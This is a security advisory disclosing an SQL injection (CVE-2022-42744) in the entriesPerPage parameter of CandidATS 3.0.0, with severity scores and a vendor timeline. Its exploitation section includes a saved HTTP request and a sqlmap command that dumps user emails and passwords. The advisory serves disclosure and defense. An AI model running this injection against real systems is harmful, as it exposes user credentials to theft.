CandidATS 3.0.0 - SQLi via entriesPerPage

Summary

NameCandidATS 3.0.0 - SQLi via entriesPerPage
Code nameMohawke
ProductCandidATS
Affected versionsVersion 3.0.0
StatePublic
Release date2022-10-25

Vulnerability

KindSQL injection
Rule146. SQL injection
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Base Score8.8
Exploit availableYes
CVE ID(s)CVE-2022-42744

Description

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks.

Vulnerability

The SQLi present in CandidATS 3.0.0 allows an unauthenticated remote attacker to perform CRUD operations on the application database. To trigger this vulnerability, we will need to send a malicious SQL query in the entriesPerPage parameter.

Exploitation

In this attack we will obtain the logs containing the emails and passwords of the users. To achieve this we will need 3 things:

candidATS.req

The request of the application, we save it in a file.

GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/2
Host: demo.candidats.net
Cookie: CATS=1eiuqu2acq6t6tcguhcof52eha
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

SqlMap Command

By executing this command, we will obtain the records of our interest.

sqlmap -r candidATS.req -p entriesPerPage -D prfkvqsyht -T user -C email,password --dump

Dump DB

Finally we see how we managed to compromise user records.

image

Our security policy

We have reserved the CVE-2022-42744 to refer to this issue from now on.

System Information

  • Version: CandidATS 3.0.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://candidats.net/

Timeline

Time-lapse-logo

2022-10-07

Vulnerability discovered.

Time-lapse-logo

2022-10-07

Vendor contacted.

Time-lapse-logo

2022-10-07

Vendor replied acknowledging the report.

Time-lapse-logo

2022-10-07

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-10-25

Public Disclosure.